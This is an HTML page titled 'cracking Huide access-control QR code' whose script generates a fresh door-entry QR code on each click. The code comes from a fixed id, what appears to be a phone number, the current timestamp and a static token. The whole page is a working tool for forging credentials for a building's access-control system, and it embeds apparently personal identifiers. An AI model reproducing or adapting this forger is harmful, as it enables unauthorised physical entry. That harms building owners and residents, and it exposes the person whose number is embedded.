<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ko" lang="ko">
<head>
<title>破解匯德門禁二維碼</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=no" />
<script type="text/javascript" src="jquery.min.js"></script>
<script type="text/javascript" src="qrcode.js"></script>
</head>
<body>
<div style="width:100%;height:80%;margin-top:50pt;margin-left:15%">
	<div id="qrcode" style="width:90%; height:100%; margin-top:15px;"></div>
</div>


<script type="text/javascript">
var qrcode = new QRCode(document.getElementById("qrcode"), {
	width : 250,
	height : 250
});

function makeCode () {		
	var timestamp = Date.parse(new Date());
	var elText = 'http://54205%7C13246304804%7C'+timestamp+'%7C440104b051/';
	qrcode.makeCode(elText);
}


$(document).ready(function(){
	makeCode();
	$("#qrcode").click(function(){
		makeCode();
	});
});


</script>
</body>